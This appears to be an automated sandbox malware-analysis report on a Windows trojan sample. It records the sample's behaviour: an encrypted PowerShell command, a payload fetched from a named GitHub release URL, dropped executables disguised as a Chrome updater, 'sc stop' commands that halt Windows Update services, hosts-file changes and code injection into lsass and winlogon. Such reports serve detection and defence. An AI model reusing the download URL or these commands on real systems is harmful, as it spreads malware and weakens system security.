      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD411C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,16_2_00007FF6CD411C64
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC647A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,23_2_00000225DC647A40

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      11
      DLL Side-Loading
      1
      Abuse Elevation Control Mechanism
      1
      File and Directory Permissions Modification
      1
      Credential API Hooking
      1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      1
      Windows Service
      11
      DLL Side-Loading
      2
      Disable or Modify Tools
      LSASS Memory2
      File and Directory Discovery
      Remote Desktop Protocol1
      Credential API Hooking
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Service Execution
      Logon Script (Windows)1
      Access Token Manipulation
      1
      Deobfuscate/Decode Files or Information
      Security Account Manager22
      System Information Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts3
      PowerShell
      Login Hook1
      Windows Service
      1
      Abuse Elevation Control Mechanism
      NTDS221
      Security Software Discovery
      Distributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script813
      Process Injection
      1
      Obfuscated Files or Information
      LSA Secrets2
      Process Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
      DLL Side-Loading
      Cached Domain Credentials21
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
      Rootkit
      DCSync1
      Application Window Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Masquerading
      Proc Filesystem1
      Remote System Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
      Virtualization/Sandbox Evasion
      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
      Access Token Manipulation
      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
      Process Injection
      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
      Hidden Files and Directories
      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1451678 Sample: SecuriteInfo.com.Win32.Evo-... Startdate: 04/06/2024 Architecture: WINDOWS Score: 100 68 objects.githubusercontent.com 2->68 70 github.com 2->70 72 2 other IPs or domains 2->72 78 Antivirus detection for URL or domain 2->78 80 Antivirus detection for dropped file 2->80 82 Multi AV Scanner detection for dropped file 2->82 84 15 other signatures 2->84 10 SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe 1 2->10         started        13 cmd.exe 1 2->13         started        15 cmd.exe 1 2->15         started        17 2 other processes 2->17 signatures3 process4 signatures5 98 Encrypted powershell cmdline option found 10->98 19 powershell.exe 14 27 10->19         started        100 Uses powercfg.exe to modify the power settings 13->100 102 Stops critical windows services 13->102 104 Modifies power options to not sleep / hibernate 13->104 24 conhost.exe 13->24         started        26 sc.exe 1 13->26         started        28 sc.exe 1 13->28         started        36 3 other processes 13->36 30 conhost.exe 15->30         started        38 4 other processes 15->38 106 Loading BitLocker PowerShell Module 17->106 32 conhost.exe 17->32         started        34 conhost.exe 17->34         started        process6 dnsIp7 74 github.com 140.82.121.4, 443, 49731 GITHUBUS United States 19->74 76 objects.githubusercontent.com 185.199.110.133, 443, 49732 FASTLYUS Netherlands 19->76 58 C:\Users\user\AppData\Local\Temp\svc.exe, PE32+ 19->58 dropped 86 Loading BitLocker PowerShell Module 19->86 88 Powershell drops PE file 19->88 40 svc.exe 2 19->40         started        44 conhost.exe 19->44         started        file8 signatures9 process10 file11 60 C:\Users\user\AppData\...\nhylsjsvllxf.tmp, PE32+ 40->60 dropped 62 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 40->62 dropped 64 C:\Windows\System32\drivers\etc\hosts, ASCII 40->64 dropped 90 Multi AV Scanner detection for dropped file 40->90 92 Suspicious powershell command line found 40->92 94 Machine Learning detection for dropped file 40->94 96 7 other signatures 40->96 46 dialer.exe 1 40->46         started        signatures12 process13 signatures14 108 Injects code into the Windows Explorer (explorer.exe) 46->108 110 Contains functionality to inject code into remote processes 46->110 112 Writes to foreign memory regions 46->112 114 4 other signatures 46->114 49 svchost.exe 46->49 injected 52 winlogon.exe 46->52 injected 54 lsass.exe 46->54 injected 56 22 other processes 46->56 process15 dnsIp16 66 192.168.2.6 unknown unknown 49->66

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe66%ReversingLabsWin32.Trojan.Zusy
      SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe68%VirustotalBrowse
      SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmp100%AviraHEUR/AGEN.1362795
      C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmp100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\svc.exe100%Joe Sandbox ML
      C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
      C:\Program Files\Google\Chrome\updater.exe79%ReversingLabsWin64.Trojan.Whisperer
      C:\Program Files\Google\Chrome\updater.exe68%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmp87%ReversingLabsWin64.Trojan.Heracles
      C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmp80%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\svc.exe79%ReversingLabsWin64.Trojan.Whisperer
      C:\Users\user\AppData\Local\Temp\svc.exe68%VirustotalBrowse
      No Antivirus matches
      SourceDetectionScannerLabelLink
      github.com0%VirustotalBrowse
      objects.githubusercontent.com1%VirustotalBrowse
      fp2e7a.wpc.phicdn.net0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
      http://pesterbdd.com/images/Pester.png100%Sophos S4malware repository domain
      http://schemas.xmlsoap.org/ws/2004/09/policy0%URL Reputationsafe
      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
      http://crl.micro0%URL Reputationsafe
      http://schemas.xmlsoap.org/wsdl/soap12/0%URL Reputationsafe
      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      http://docs.oasis-open.org/ws-sx/ws-trust/2005120%URL Reputationsafe
      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%Avira URL Cloudsafe
      http://ocsp.di0%Avira URL Cloudsafe
      https://github.com0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/wsdl/erties0%Avira URL Cloudsafe
      http://ocsp.msocsp.0%Avira URL Cloudsafe
      https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq0%Avira URL Cloudsafe
      https://github.com/Pester/Pester0%Avira URL Cloudsafe
      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%VirustotalBrowse
      http://github.com0%Avira URL Cloudsafe
      https://objects.githubusercontent.com0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%Avira URL Cloudsafe
      https://github.com/Pester/Pester1%VirustotalBrowse
      http://github.com0%VirustotalBrowse
      https://github.com0%VirustotalBrowse
      https://aka.ms/pscore6lBfq0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%VirustotalBrowse
      https://github.com/tarzanre/myrepo/releases/download/a/steam.exe0%Avira URL Cloudsafe
      http://objects.githubusercontent.com0%Avira URL Cloudsafe
      https://objects.githubusercontent.com/github-production-release-asset-2e65be/672232730/d6a03019-07cf0%Avira URL Cloudsafe
      https://objects.githubusercontent.com1%VirustotalBrowse
      http://objects.githubusercontent.com1%VirustotalBrowse
      https://github.com/tarzanre/myrepo/releases/download/a/steam.exe0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      github.com
      140.82.121.4
      truefalseunknown
      objects.githubusercontent.com
      185.199.110.133
      truefalseunknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalseunknown
      NameMaliciousAntivirus DetectionReputation
      https://github.com/tarzanre/myrepo/releases/download/a/steam.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1730889772.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1844700325.00000202F2274000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmptrue
      • URL Reputation: malware
      • Sophos S4: malware repository domain
      unknown
      http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000018.00000000.1775533787.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.2928618184.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1726618411.0000000004596000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1799500674.00000202E2429000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      https://github.compowershell.exe, 00000001.00000002.1726618411.0000000004596000.00000004.00000800.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://ocsp.dipowershell.exe, 00000001.00000002.1726618411.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1726618411.0000000004A59000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
